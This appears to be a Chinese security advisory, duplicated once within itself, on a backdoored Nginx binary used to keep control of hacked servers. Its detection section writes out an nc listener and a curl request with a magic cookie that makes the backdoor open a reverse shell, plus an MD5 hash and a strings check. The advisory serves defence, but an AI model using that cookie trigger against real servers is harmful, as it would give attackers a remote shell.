【高危】- Nginx 新型后门风险通告
■ 漏洞描述
近日、Nginx公布一个新型nginx后门,该后门免杀效果非常好,截至目前VT上所有杀毒软件都不能对其进行查杀。Nginx (engine x) 是一个高性能的HTTP和反向代理web服务器,同时也提供了IMAP/POP3/SMTP服务。
黑客需要通过其他路径入侵服务器后,通过替换Nginx从而进一步维持权限,并非Nginx软件本身存在漏洞。攻击者利用该后门可进维持权限,控制服务器。
■ 影响范围
无
■ 漏洞检测
1、网络排查:
首先通过nc本地监听9999端口:
$ nc -lv 9999
接着使用curl带上特殊cookie对本地地址发起请求:
$ curl "127.0.0.1" -H "Cookie:lkfakjfa0.0.0.0:9999"
如果在监听端口得到shell,说明服务器的nginx已经被黑客替换。
2、本地排查:
通过grep命令判断当前运行对nginx里面是否存在"lkfakjf","/bin/sh"等可疑字符串。
strings /usr/sbin/nginx|grep "lkfakjf"
3、查看文件文件md5,hash值为ab498686505dfc645e14c6edad280da7。
■ 漏洞修复
从官网下载安全版本。下载地址:
https://www.nginx.com/
■ 临时修复
无
■ 漏洞详情
https://ti.dbappsecurity.com.cn/informationDetail?id=947
近日、Nginx公布一个新型nginx后门,该后门免杀效果非常好,截至目前VT上所有杀毒软件都不能对其进行查杀。Nginx (engine x) 是一个高性能的HTTP和反向代理web服务器,同时也提供了IMAP/POP3/SMTP服务。
黑客需要通过其他路径入侵服务器后,通过替换Nginx从而进一步维持权限,并非Nginx软件本身存在漏洞。攻击者利用该后门可进维持权限,控制服务器。
■ 影响范围
无
■ 漏洞检测
1、网络排查:
首先通过nc本地监听9999端口:
$ nc -lv 9999
接着使用curl带上特殊cookie对本地地址发起请求:
$ curl "127.0.0.1" -H "Cookie:lkfakjfa0.0.0.0:9999"
如果在监听端口得到shell,说明服务器的nginx已经被黑客替换。
2、本地排查:
通过grep命令判断当前运行对nginx里面是否存在"lkfakjf","/bin/sh"等可疑字符串。
strings /usr/sbin/nginx|grep "lkfakjf"
3、查看文件文件md5,hash值为ab498686505dfc645e14c6edad280da7。
■ 漏洞修复
从官网下载安全版本。下载地址:
https://www.nginx.com/
■ 临时修复
无
■ 漏洞详情
https://ti.dbappsecurity.com.cn/informationDetail?id=947